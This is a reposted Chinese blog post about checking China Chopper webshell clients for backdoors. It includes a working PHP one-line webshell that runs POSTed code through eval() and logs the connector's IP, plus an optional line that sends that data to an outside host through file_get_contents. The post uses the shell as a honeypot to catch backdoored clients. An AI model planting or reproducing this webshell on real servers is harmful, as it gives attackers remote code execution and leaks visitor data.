菜刀php后门,关于菜刀后门排查
關于菜刀后門排查
小杰哥 (能學則學,技多不壓身。) | 2016-03-08 14:56
最近菜刀后門被爆出來后??大家都在尋找沒有后門的菜刀
可是…
人家說沒后門??你卻不知道是否真的沒有后門(除非自己抓下包或者反編譯看看)
去年的時候菜刀后門事件被爆 可沒有現在那么火熱
我也在挺早的時間查了一下自己的菜刀??確實有發現請求,不過現在去掉了
可是…??記得前段時間看到一篇文章 連上菜刀不發包??但是你做操作的時候才發包 這個也有遇到過..
于是… 還是被爆菊
我和大家分享一下我是如何發現菜刀是否存在后門的
我稍微修改了一句話木馬??從而使他連接會記錄連接者的IP
代碼:
header("Content-type:text/html;charset=utf-8");
if(!empty($_POST['t'])){
$t = fopen("1.txt","a+");
fwrite($t,"Hakcer IP: ".@$_SERVER['REMOTE_ADDR']." Hacker Name: ".@$_SERVER['REMOTE_HOST']." Hacker Prot: ".@$_SERVER['REMOTE_PORT']."\r\n");
eval($_POST['t']);
}
?>
1.txt 是在馬的目錄下的?? 各位可自行修改為遠程發送
file_get_contents("http://www.t0n9.com/1.php?i=".@$_SERVER['REMOTE_ADDR']."&n=".@$_SERVER['REMOTE_HOST']."&p="@$_SERVER['REMOTE_PORT']);
這個有點守株待兔的感覺
到現在為止我博客的一句話都沒有人連…
拋磚引玉,希望各位共享一下自己排查后門的方法與姿勢!
總結
以上是生活随笔為你收集整理的菜刀php后门,关于菜刀后门排查的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 屏蔽博客园背景动态线条
- 下一篇: 微信小程序登录注册流程(获取手机号)